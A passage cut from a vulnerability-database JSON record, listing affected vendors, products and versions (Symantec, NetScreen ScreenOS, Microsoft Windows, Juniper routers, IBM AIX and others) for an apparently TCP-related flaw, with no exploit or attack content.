            "model": "gateway security",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "53001.0"
          },
          {
            "_id": null,
            "model": "gateway security 460r",
            "scope": null,
            "trust": 0.3,
            "vendor": "symantec",
            "version": null
          },
          {
            "_id": null,
            "model": "gateway security",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "460"
          },
          {
            "_id": null,
            "model": "gateway security",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "440"
          },
          {
            "_id": null,
            "model": "gateway security",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "4200"
          },
          {
            "_id": null,
            "model": "gateway security 360r build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "2.1415"
          },
          {
            "_id": null,
            "model": "gateway security 360r build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "2.1300"
          },
          {
            "_id": null,
            "model": "gateway security 360r",
            "scope": null,
            "trust": 0.3,
            "vendor": "symantec",
            "version": null
          },
          {
            "_id": null,
            "model": "gateway security",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "360"
          },
          {
            "_id": null,
            "model": "gateway security",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "320"
          },
          {
            "_id": null,
            "model": "firewall/vpn appliance 200r",
            "scope": null,
            "trust": 0.3,
            "vendor": "symantec",
            "version": null
          },
          {
            "_id": null,
            "model": "firewall/vpn appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "200"
          },
          {
            "_id": null,
            "model": "firewall/vpn appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "100"
          },
          {
            "_id": null,
            "model": "enterprise firewall solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "enterprise firewall nt/2000",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "enterprise firewall solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "7.0.4"
          },
          {
            "_id": null,
            "model": "enterprise firewall nt/2000",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "7.0.4"
          },
          {
            "_id": null,
            "model": "enterprise firewall solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "enterprise firewall nt/2000",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "irix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sgi",
            "version": "6.5.25"
          },
          {
            "_id": null,
            "model": "irix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sgi",
            "version": "6.5.24"
          },
          {
            "_id": null,
            "model": "irix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sgi",
            "version": "6.5.23"
          },
          {
            "_id": null,
            "model": "irix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sgi",
            "version": "6.5.22"
          },
          {
            "_id": null,
            "model": "turbo",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seil",
            "version": "1.18"
          },
          {
            "_id": null,
            "model": "neu t1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seil",
            "version": "2.21"
          },
          {
            "_id": null,
            "model": "neu t1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seil",
            "version": "1.89"
          },
          {
            "_id": null,
            "model": "neu atm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seil",
            "version": "1.35"
          },
          {
            "_id": null,
            "model": "neu 2fe plus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seil",
            "version": "1.9"
          },
          {
            "_id": null,
            "model": "neu 2fe",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seil",
            "version": "2.21"
          },
          {
            "_id": null,
            "model": "neu 2fe",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seil",
            "version": "1.89"
          },
          {
            "_id": null,
            "model": "neu",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seil",
            "version": "1282.21"
          },
          {
            "_id": null,
            "model": "neu",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seil",
            "version": "1281.89"
          },
          {
            "_id": null,
            "model": "unixware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sco",
            "version": "7.1.3"
          },
          {
            "_id": null,
            "model": "unixware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sco",
            "version": "7.1.1"
          },
          {
            "_id": null,
            "model": "open server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sco",
            "version": "5.0.7"
          },
          {
            "_id": null,
            "model": "open server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sco",
            "version": "5.0.6"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "screenos r4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "screenos r3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "screenos r2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "screenos r1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "screenos r9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "screenos r8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "screenos r7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "screenos r6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "screenos r5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "screenos r4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "screenos r3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "screenos r2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "screenos r10",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "screenos r1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "screenos r9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "screenos r8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "screenos r7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "screenos r6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "screenos r5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "screenos r4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "screenos r3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "screenos r2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "screenos r12",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "screenos r11",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "screenos r10",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "screenos r1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "screenos -dial",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "screenos r2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.1.1"
          },
          {
            "_id": null,
            "model": "screenos r9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "screenos r8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "screenos r7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "screenos r6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "screenos r5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "screenos r4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "screenos r3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "screenos r2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "screenos r12",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "screenos r11",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "screenos r10",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "screenos r1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "screenos r8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "screenos r7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "screenos r6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "screenos r5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "screenos r4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "screenos r3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "screenos r2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "screenos r1.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "screenos r1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "screenos r7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "screenos r6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "screenos r5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "screenos r4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "screenos r3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "screenos r2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "screenos r1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "screenos r4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "screenos r3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "screenos r2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "screenos r1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "screenos r4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.10"
          },
          {
            "_id": null,
            "model": "screenos r3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.10"
          },
          {
            "_id": null,
            "model": "screenos r1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.8"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.8"
          },
          {
            "_id": null,
            "model": "screenos r3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.7.1"
          },
          {
            "_id": null,
            "model": "screenos r2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.7.1"
          },
          {
            "_id": null,
            "model": "screenos r1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.7.1"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.7.1"
          },
          {
            "_id": null,
            "model": "screenos r9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "screenos r8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "screenos r7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "screenos r6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "screenos r5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "screenos r4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "screenos r3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "screenos r2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "screenos r12",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "screenos r11",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "screenos r10",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "screenos r1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.6"
          },
          {
            "_id": null,
            "model": "screenos r6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "screenos r2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "screenos r1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "screenos r7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "screenos r6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "screenos r8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "screenos r2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "1.73"
          },
          {
            "_id": null,
            "model": "screenos r1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "1.73"
          },
          {
            "_id": null,
            "model": "screenos r2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "1.66"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "1.66"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "1.64"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netscreen",
            "version": "1.7"
          },
          {
            "_id": null,
            "model": "beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "windows xp tablet pc edition sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp tablet pc edition sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp tablet pc edition",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp professional edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "x64"
          },
          {
            "_id": null,
            "model": "windows xp professional sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp professional sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp professional",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp media center edition sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp media center edition sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp media center edition",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp home sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp home sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp home",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp embedded sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp embedded",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp 64-bit edition version",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows xp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "0"
          },
          {
            "_id": null,
            "model": "windows server web edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server web edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "windows server standard edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "windows server enterprise edition itanium sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server enterprise edition itanium",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20030"
          },
          {
            "_id": null,
            "model": "windows server enterprise edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition itanium sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition itanium",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20030"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows professional sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows professional sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows professional sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows professional sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows datacenter server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows datacenter server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows datacenter server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows datacenter server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows datacenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows advanced server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows advanced server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows advanced server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows advanced server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows advanced server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "data loss prevention",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mcafee",
            "version": "9.2.2"
          },
          {
            "_id": null,
            "model": "data loss prevention",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mcafee",
            "version": "9.2.1"
          },
          {
            "_id": null,
            "model": "data loss prevention",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mcafee",
            "version": "9.2.0"
          },
          {
            "_id": null,
            "model": "data loss prevention",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mcafee",
            "version": "8.6"
          },
          {
            "_id": null,
            "model": "t-series router t640",
            "scope": null,
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "t-series router t320",
            "scope": null,
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "m-series router m5",
            "scope": null,
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "m-series router m40e",
            "scope": null,
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "m-series router m40",
            "scope": null,
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "m-series router m20",
            "scope": null,
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "m-series router m160",
            "scope": null,
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "m-series router m10",
            "scope": null,
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "e-series router",
            "scope": null,
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "nichestack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "interniche",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "nichelite",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "interniche",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "rfc tcp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ietf",
            "version": "793:"
          },
          {
            "_id": null,
            "model": "rfc tcp extensions for high performance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ietf",
            "version": "1323:"
          },
          {
            "_id": null,
            "model": "aix l",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "aix l",
